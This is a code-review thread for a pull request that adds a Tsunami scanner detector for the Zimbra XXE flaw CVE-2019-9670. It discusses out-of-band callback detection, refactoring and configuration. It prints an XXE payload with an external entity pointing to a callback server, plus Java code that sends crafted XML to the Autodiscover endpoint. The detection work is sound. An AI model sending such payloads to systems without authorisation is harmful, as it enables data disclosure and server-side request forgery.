Add CVE-2019-9670 Zimbra XXE Detector

[LeonardoE95]

Hi there,

This PR contains the implementation for the CVE-2019-9670 detector.

Below it is possible to find the necessary information for review:

• Issue: PRP: CVE-2019-9670 - Synacor Zimbra XXE #579
• PR Testbed: Testbed for CVE-2019-9670 - Synacor Zimbra XXE security-testbeds#113

Thank you.

[giacomo-doyensec]

Hello @LeonardoE95, thanks for your contribution!

I reviewed your plugin and found that while the detection is working, it would be better to leverage Tsunami’s built-in mechanism. A simple way to implement out-of-band (OOB) detection is by including an external DTD pointing to the callback server:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://tsunami-callback-server:port/?secret=zimbraXXE">]>
<Request>
<EMailAddress>email</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>

If the callback server is enabled, Tsunami should generate a OOB payload for your template; otherwise, it can fall back to a reflective approach.

For reference, you can check these PRs:

• tsunami-security-scanner-plugins/community/detectors/roxy_wi_cve_2022_31137/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202231137/Cve202231137Detector.java

  Lines 120 to 158 in 3f65b03

  	private boolean isServiceVulnerable(NetworkService networkService) {
  	PayloadGeneratorConfig config =
  	PayloadGeneratorConfig.newBuilder()
  	.setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
  	.setInterpretationEnvironment(
  	PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL)
  	.setExecutionEnvironment(
  	PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
  	.build();
  	Payload payload = payloadGenerator.generate(config);
  	String cmd = payload.getPayload();
  	HttpResponse response = null;
  	String targetVulnerabilityUrl =
  	NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + VULNERABLE_REQUEST_PATH;
  	try {
  	response =
  	httpClient.send(
  	post(targetVulnerabilityUrl)
  	.withEmptyHeaders()
  	.setRequestBody(
  	ByteString.copyFromUtf8(
  	String.format(
  	HTTP_PARAMETERS, URLEncoder.encode(cmd, StandardCharsets.UTF_8))))
  	.build(),
  	networkService);
  	} catch (IOException | AssertionError e) {
  	logger.atWarning().withCause(e).log("Request to target %s failed", networkService);
  	}
  	if (response == null || response.bodyString().isEmpty()) {
  	return false;
  	}
  	if (payload.getPayloadAttributes().getUsesCallbackServer()) {
  	logger.atInfo().log("Waiting for RCE callback.");
  	Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration));
  	}
  	return payload.checkIfExecuted(response.bodyString().get());
  	}

• tsunami-security-scanner-plugins/doyensec/detectors/magento_cosmicsting_xxe/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202434102/MagentoCosmicStingXxe.java

  Lines 339 to 412 in 85726ac

  	private boolean isServiceVulnerable(NetworkService networkService) {
  	// Fetch the version of the running Magento instance
  	this.detectedMagentoVersion = detectMagentoVersion(networkService);
  	// Generate the payload for the callback server
  	PayloadGeneratorConfig config =
  	PayloadGeneratorConfig.newBuilder()
  	.setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF)
  	.setInterpretationEnvironment(
  	PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY)
  	.setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY)
  	.build();
  	String oobCallbackUrl = "";
  	Payload payload = null;
  	// Check if the callback server is available, fallback to response matching if not
  	try {
  	payload = this.payloadGenerator.generate(config);
  	// Use callback for RCE confirmation and raise severity on success
  	if (payload == null || !payload.getPayloadAttributes().getUsesCallbackServer()) {
  	logger.atWarning().log(
  	"Tsunami Callback Server not available: detector will use response matching only.");
  	responseMatchingOnly = true;
  	} else {
  	oobCallbackUrl = ensureCorrectUrlFormat(payload.getPayload());
  	}
  	} catch (NotImplementedException e) {
  	responseMatchingOnly = true;
  	}
  	// Build the XML XXE payload
  	// Note: when the callback server is not available, oobCallbackUrl will be an empty string.
  	// This is fine, as in that case we only care about the HTTP response, the contents of the
  	// payload don't really matter.
  	String xxePayload =
  	PAYLOAD_TEMPLATE
  	.replace("{OOB_CALLBACK}", oobCallbackUrl)
  	.replace("{DTD_FILE}", DTD_FILE_URL);
  	// Wrap the XXE payload in a JSON object
  	String jsonPayload = getJsonPayload(xxePayload);
  	// Send the malicious HTTP request
  	boolean responseMatchingVulnerable = sendPayload(networkService, jsonPayload);
  	// No need to wait for the callback when the callback server is not available
  	if (responseMatchingOnly) {
  	if (responseMatchingVulnerable) {
  	logger.atInfo().log("Vulnerability confirmed via response matching.");
  	}
  	return responseMatchingVulnerable;
  	}
  	logger.atInfo().log("Waiting for XXE callback.");
  	Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration));
  	// payload should never be null here as we should have already returned in that case
  	verify(payload != null);
  	if (payload.checkIfExecuted()) {
  	logger.atInfo().log("Vulnerability confirmed via Callback Server.");
  	return true;
  	} else if (responseMatchingVulnerable) {
  	logger.atWarning().log(
  	"HTTP response seems vulnerable, but no callback was received. Other mitigations may have"
  	+ " been applied.");
  	return false;
  	} else {
  	logger.atInfo().log(
  	"Callback not received and response does not match vulnerable instance, instance is not"
  	+ " vulnerable.");
  	return false;
  	}
  	}

Feel free to reach out if you have any questions - I’d be happy to provide more details and assistance.

[LeonardoE95]

Hi @giacomo-doyensec!

Added the OOB detection strategy if the callback server is available.
Added new test cases.

[giacomo-doyensec]

Hi @LeonardoE95, thanks for the updates!

With my suggestion, I was hoping to unify the detection logic for both cases. However, while reviewing the isServiceVulnerable function, I found that the default payload for SSRF that does not use the callback server relies on http://public-firing-range.appspot.com/. The response contains HTML tags, which in the case of an XXE prevents us from using the same template and detection logic for both approaches. The reflected one will return the same error as the patched version: Body cannot be parsed.

For now, we can stick with the "two templates approach". The suggested implementation will be easier to modify if the default behavior ever changes in our favor.

Other changes include:

• The use of annotations in oobSleepDuration within sleepUninterruptibly. This is required when running tests (please update them where needed). More details on how to implement annotations for injecting the sleep duration can be found in this comment by one of my colleagues. You will also need to add dependencies to the build.gradle file.
• Some minor fixes to the isZimbra fingerprint function.

As a last suggestion, consider merging the tests into a single file named Cve20199670DetectorTest.java.

Let me know if anything isn't clear, and I'll be happy to provide additional information!

[giacomo-doyensec]

Suggested change

:-----:|

[LeonardoE95]

Solved.

[giacomo-doyensec]

Introduce oobSleepDuration to allow a more configurable implementation

Suggested change

	@Inject
	Cve20199670Detector(
	@UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) {
	this.utcClock = checkNotNull(utcClock);
	this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build();
	this.payloadGenerator = checkNotNull(payloadGenerator);
	}
	private final int oobSleepDuration;
	@Inject
	Cve20199670Detector(
	@UtcClock Clock utcClock,
	HttpClient httpClient,
	PayloadGenerator payloadGenerator,
	@OobSleepDuration int oobSleepDuration) {
	this.utcClock = checkNotNull(utcClock);
	this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build();
	this.payloadGenerator = checkNotNull(payloadGenerator);
	this.oobSleepDuration = oobSleepDuration;
	}

[LeonardoE95]

Added Annotation support for oobSleepDuration as requested.

[giacomo-doyensec]

Suggested change

	try {
	HttpRequest request = HttpRequest.get(targetUri).withEmptyHeaders().build();
	HttpResponse response = response = this.httpClient.send(request, networkService);
	HttpRequest request = HttpRequest.get(targetUri).withEmptyHeaders().build();
	try {
	HttpResponse response = this.httpClient.send(request, networkService);

[LeonardoE95]

Solved.

[giacomo-doyensec]

Suggested change

	return false;
	logger.atWarning().withCause(e).log("Request to target '%s' failed", targetUri);
	return false;

[LeonardoE95]

Logs added to catch blocks.

[giacomo-doyensec]

Suggested change

	targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + AUTODISCOVER_PATH;
	try {
	HttpRequest request = HttpRequest.get(targetUri).withEmptyHeaders().build();
	HttpResponse response = response = this.httpClient.send(request, networkService);
	isZimbra = isZimbra && (response.status().code() == 200);
	} catch (IOException e) {
	return false;
	targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + AUTODISCOVER_PATH;
	request = HttpRequest.get(targetUri).withEmptyHeaders().build();
	try {
	HttpResponse response = this.httpClient.send(request, networkService);
	isZimbra &= response.status().code() == 200;
	} catch (IOException e) {
	logger.atWarning().withCause(e).log("Request to target '%s' failed", targetUri);
	return false;

[LeonardoE95]

Solved.

[giacomo-doyensec]

Here is my suggested implementation of the isServiceVulnerable function.

Suggested change

	private boolean isServiceVulnerable(NetworkService networkService) {
	if (payloadGenerator.isCallbackServerEnabled()) {
	return testWithCallbackServer(networkService);
	} else {
	return testWithoutCallbackServer(networkService);
	}
	}
	private boolean isServiceVulnerable(NetworkService networkService) {
	PayloadGeneratorConfig config =
	PayloadGeneratorConfig.newBuilder()
	.setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF)
	.setInterpretationEnvironment(
	PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY)
	.setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY)
	.build();
	Payload payload = payloadGenerator.generate(config);
	String callbackUrl = payload.getPayload();
	String xmlPayload;
	if (payload.getPayloadAttributes().getUsesCallbackServer()) {
	xmlPayload = String.format(PAYLOAD_TEMPLATE_OOB, callbackUrl);
	} else {
	xmlPayload = String.format(PAYLOAD_TEMPLATE_REFLECTED, callbackUrl);
	}
	String targetUri =
	NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + AUTODISCOVER_PATH;
	HttpRequest request = prepareRequest(targetUri, xmlPayload);
	HttpResponse response = null;
	try {
	response = httpClient.send(request, networkService);
	} catch (IOException e) {
	logger.atWarning().withCause(e).log("Request to target '%s' failed", targetUri);
	}
	if (response == null || response.bodyString().isEmpty()) {
	// This may be a situation where error handling and logging are needed.
	return false;
	}
	if (payload.getPayloadAttributes().getUsesCallbackServer()) {
	logger.atInfo().log("Waiting for RCE callback.");
	Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(oobSleepDuration));
	return payload.checkIfExecuted(response.bodyString().get());
	}
	return response.bodyString().get().contains(callbackUrl);
	}

[LeonardoE95]

Both cases have now been merged into isServiceVulnerable.

[LeonardoE95]

Here I've omitted the line if (response == null || response.bodyString().isEmpty()).

Thinking is that no exception has been launched by the httpClient.send method at that point, therefore the response should not be null. And if it is empty, the current code will cover that case and return false.

Rest was adjusted as suggested, thanks!

[LeonardoE95]

The line payload.checkIfExecuted(response.bodyString().get()) has also been changed to remove the arguments into payload.checkIfExecuted(), to force the scanner to check with the callback server.

This might not be completely required, however I wanted to be more explicit about it.

[giacomo-doyensec]

We can remove these functions altogether since they are now merged into the caller.

Suggested change

	private boolean testWithCallbackServer(NetworkService networkService) {
	boolean isVulnerable = false;
	if (!payloadGenerator.isCallbackServerEnabled()) {
	// Callback server is required
	return false;
	}
	PayloadGeneratorConfig config =
	PayloadGeneratorConfig.newBuilder()
	.setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF)
	.setInterpretationEnvironment(
	PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY)
	.setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY)
	.build();
	Payload payload = payloadGenerator.generate(config);
	if (!payload.getPayloadAttributes().getUsesCallbackServer()) {
	// Callback server is required
	return false;
	}
	// Construct the payload with URL that points to callback server
	String oobCallbackUrl = payload.getPayload();
	String oobPayload = String.format(PAYLOAD_TEMPLATE_OOB, oobCallbackUrl);
	String targetUri =
	NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + AUTODISCOVER_PATH;
	HttpRequest request = prepareRequest(targetUri, oobPayload);
	try {
	HttpResponse response = httpClient.send(request, networkService);
	logger.atInfo().log("Waiting for XXE callback.");
	Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
	isVulnerable = payload.checkIfExecuted();
	} catch (IOException e) {
	logger.atWarning().withCause(e).log("Request to target '%s' failed", targetUri);
	return false;
	}
	return isVulnerable;
	}
	private boolean testWithoutCallbackServer(NetworkService networkService) {
	boolean isVulnerable = false;
	String reflectedPayload = String.format(PAYLOAD_TEMPLATE_REFLECTED, TEST_STRING);
	String targetUri =
	NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + AUTODISCOVER_PATH;
	HttpRequest request = prepareRequest(targetUri, reflectedPayload);
	try {
	HttpResponse response = httpClient.send(request, networkService);
	isVulnerable =
	(response.status().code() == 503)
	&& response
	.bodyString()
	// To decrease false positive rate, match also with specific error message
	.map(body -> (body.contains(TEST_STRING) && body.contains(ERROR_MSG)))
	.orElse(false);
	} catch (IOException e) {
	logger.atWarning().withCause(e).log("Request to target '%s' failed", targetUri);
	return false;
	}
	return isVulnerable;
	}

[LeonardoE95]

Both cases have now been merged into isServiceVulnerable.

[giacomo-doyensec]

Here, the configurations related to the oobSleepDuration variable introduced in the detector can be added.

Suggested change

	}
	@Provides
	@OobSleepDuration
	int provideOobSleepDuration(Cve20199670DetectorConfigs configs) {
	if (configs.oobSleepDuration == 0) {
	return 10;
	}
	return configs.oobSleepDuration;
	}
	}

[LeonardoE95]

Added Annotation support for oobSleepDuration as requested.

[giacomo-doyensec]

Thank you! Once you apply this two typo fixes down below, I believe we've addressed everything.

[giacomo-doyensec]

Suggested change

	HttpResponse response = response = this.httpClient.send(request, networkService);
	HttpResponse response = this.httpClient.send(request, networkService);

[LeonardoE95]

Fixed typo.

[giacomo-doyensec]

Suggested change

	HttpResponse response = response = this.httpClient.send(request, networkService);
	HttpResponse response = this.httpClient.send(request, networkService);

[LeonardoE95]

Fixed typo.

[giacomo-doyensec]

LGTM - Approved
@maoning we can merge this and google/security-testbeds#113

Reviewer: Giacomo, Doyensec
Plugin: CVE-2019-9670 - Zimbra XXE